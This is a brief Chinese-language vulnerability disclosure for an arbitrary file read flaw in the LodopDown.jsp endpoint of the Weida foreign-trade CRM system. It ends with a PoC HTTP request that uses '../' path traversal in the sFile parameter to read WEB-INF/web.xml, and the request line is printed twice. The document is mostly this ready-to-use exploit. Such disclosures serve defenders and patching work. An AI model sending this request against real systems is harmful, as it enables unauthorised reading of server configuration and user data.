漏洞描述
维达外贸客户关系管理系统中的LodopDown功能存在任意文件读取漏洞,攻击者可以利用该漏洞通过构造特定的请求,读取服务器上任意文件的内容。这可能包括敏感的配置文件、用户数据或其他重要信息,进而导致数据泄露和系统安全风险。
维达外贸客户关系管理系统LodopDown存在任意文件读取漏洞
PoC代码
GET /file/LodopDown.jsp?sFile=../../WEB-INF/web.xml HTTP/1.1GET /file/LodopDown.jsp?sFile=../../WEB-INF/web.xml HTTP/1.1